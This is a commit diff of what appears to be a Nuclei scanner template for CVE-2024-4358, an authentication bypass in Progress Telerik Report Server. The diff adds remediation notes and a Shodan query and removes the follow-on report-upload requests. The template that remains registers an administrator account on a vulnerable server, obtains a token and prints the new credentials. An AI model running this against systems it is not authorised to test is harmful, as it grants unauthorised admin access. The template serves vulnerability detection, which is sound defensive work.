minor update

http/cves/2024/CVE-2024-4358.yaml

@@ -1,16 +1,21 @@
 id: CVE-2024-4358
 
 info:
-  name: Telerik Report Server - Authentication Bypass
+  name: Progress Telerik Report Server - Authentication Bypass
   author: DhiyaneshDK
   severity: critical
   description: |
     In Progress Telerik Report Server, version 2024 Q1 (10.0.24.305) or earlier, on IIS, an unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability.
+  impact: An unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability.
+  remediation: Updating to Report Server 2024 Q2 (10.1.24.514) or later.
   reference:
     - https://summoning.team/blog/progress-report-server-rce-cve-2024-4358-cve-2024-1800/
     - https://github.com/sinsinology/CVE-2024-4358
+    - https://docs.telerik.com/report-server/knowledge-base/registration-auth-bypass-cve-2024-4358
   metadata:
-    shodan-query: "Log in | Telerik Report Server"
+    shodan-query: title:"Log in | Telerik Report Server"
+    verified: true
+    max-request: 2
   tags: cve,cve2024,telerik,progress,auth-bypass
 
 variables:
@@ -19,8 +24,6 @@ variables:
   email: "{{randstr}}@{{rand_base(5)}}.com"
   firstname: "{{rand_base(5)}}"
   lastname: "{{rand_base(5)}}"
-  report: "{{to_lower(rand_text_alpha(8))}}"
-  content: "{{}}" ##To Be Added
 
 http:
   - raw:
@@ -38,33 +41,11 @@ http:
 
         grant_type=password&username={{user}}&password={{pass}}
 
-      - |
-        POST /api/reportserver/report HTTP/1.1
-        Host: {{Hostname}}
-        Authorization: Bearer {{token}}
-        Content-Type: application/json
-
-        {"reportName": "{{report}}", "categoryName": "Samples", "description": null, "reportContent": "{{content}}", "extension": ".trdp"}
-
-      - |
-        POST /api/reports/clients HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/json
-
-        {"timeStamp": null}
-
-      - |
-        POST /api/reports/clients/{{clientid}}/parameters HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/json
-
-        {"report": "NAME/Samples/{{report}}/", "parameterValues": {}}
-
     matchers:
       - type: dsl
         dsl:
           - 'contains(content_type_2, "application/json")'
-          - 'contains(body_2, "access_token") && contains(body_4, "clientId") && contains(body_5, "message")'
+          - 'contains_all(body_2, "access_token", "userName", "token_type")'
           - 'status_code_2 == 200'
         condition: and
 
@@ -77,10 +58,7 @@ http:
           - '"access_token":"([A-Z0-9a-z_-]+)"'
         internal: true
 
-      - type: regex
-        name: clientid
-        part: body_4
-        group: 1
-        regex:
-          - '"clientId":"([a-z0-9]+)"'
-        internal: true
+      - type: dsl
+        dsl:
+          - '"Username: "+ user'
+          - '"Password: "+ pass'